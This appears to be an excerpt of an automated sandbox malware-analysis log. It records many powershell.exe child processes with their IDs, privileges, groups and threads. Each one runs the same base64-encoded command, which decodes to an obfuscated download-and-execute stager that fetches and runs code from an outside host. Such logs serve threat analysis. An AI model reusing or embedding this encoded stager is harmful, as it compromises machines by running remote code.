	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1725
	os_tid = 0x1f24

	[0857.777] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1930
	os_tid = 0x260c


Thread:
	id = 1966
	os_tid = 0x26a0


Process:
	id = "258"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5df18000"
	os_pid = "0x1384"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "117"
	os_parent_pid = "0xdfc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1735
	os_tid = 0xbb4

	[0831.573] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1857
	os_tid = 0x2498


Thread:
	id = 1864
	os_tid = 0x24b4


Process:
	id = "259"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x50207000"
	os_pid = "0x1b94"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "92"
	os_parent_pid = "0x11ac"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1736
	os_tid = 0x2310

	[0828.744] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1832
	os_tid = 0x2414


Thread:
	id = 1843
	os_tid = 0x244c


Process:
	id = "260"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5bde4000"
	os_pid = "0x1fb8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1737
	os_tid = 0x1fb0

	[0860.354] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1925
	os_tid = 0x25f8


Thread:
	id = 1956
	os_tid = 0x2678


Process:
	id = "261"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6084e000"
	os_pid = "0x10d4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "52"
	os_parent_pid = "0xe94"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1740
	os_tid = 0x1fe0

	[0825.893] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1852
	os_tid = 0x2478


Thread:
	id = 1863
	os_tid = 0x24b0


Process:
	id = "262"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x56e76000"
	os_pid = "0x1fb4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "55"
	os_parent_pid = "0xee0"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1741
	os_tid = 0x22c0

	[0828.963] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1833
	os_tid = 0x241c


Thread:
	id = 1844
	os_tid = 0x2450


Process:
	id = "263"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x57198000"
	os_pid = "0x2264"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "54"
	os_parent_pid = "0xec8"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1742
	os_tid = 0x2330

	[0829.009] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1861
	os_tid = 0x24a8


Thread:
	id = 1876
	os_tid = 0x24f0


Process:
	id = "264"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x455d1000"
	os_pid = "0x1a5c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1760
	os_tid = 0x1e10

	[0860.191] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1917
	os_tid = 0x25d0


Thread:
	id = 1942
	os_tid = 0x263c


Process:
	id = "265"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x657e1000"
	os_pid = "0x1f40"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1786
	os_tid = 0x1a84

	[0879.981] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1945
	os_tid = 0x264c


Thread:
	id = 1967
	os_tid = 0x26a4


Process:
	id = "266"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3a228000"
	os_pid = "0x1d20"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "50"
	os_parent_pid = "0xe5c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1813
	os_tid = 0x1ff4

	[0852.158] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1847
	os_tid = 0x2464


Thread:
	id = 1859
	os_tid = 0x24a0


Thread:
	id = 2143
	os_tid = 0x24b0


Thread:
	id = 2145
	os_tid = 0x249c


Thread:
	id = 2146
	os_tid = 0x24c0


Process:
	id = "267"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x63bfe000"
	os_pid = "0x1f1c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1809
	os_tid = 0x1ff0

	[0882.178] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1976
	os_tid = 0x26c8


Thread:
	id = 1983
	os_tid = 0x26e4


Process:
	id = "268"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6131b000"
	os_pid = "0x1924"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1821
	os_tid = 0x1aa4

	[0883.956] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1968
	os_tid = 0x26a8


Thread:
	id = 1979
	os_tid = 0x26d4


Process:
	id = "269"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2faf3000"
	os_pid = "0x243c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1841
	os_tid = 0x2440

	[0887.635] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1980
	os_tid = 0x26d8


Thread:
	id = 1988
	os_tid = 0x26f8


Process:
	id = "270"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6fda2000"
	os_pid = "0x247c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "78"
	os_parent_pid = "0xbb8"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1879
	os_tid = 0x2480

	[0877.747] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1914
	os_tid = 0x25c4


Thread:
	id = 1940
	os_tid = 0x2634


Process:
	id = "271"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1bfa7000"
	os_pid = "0x24d4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1872
	os_tid = 0x24d8

	[0880.942] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1974
	os_tid = 0x26c0


Thread:
	id = 1981
	os_tid = 0x26dc


Process:
	id = "272"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4208f000"
	os_pid = "0x2544"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "153"
	os_parent_pid = "0x147c"
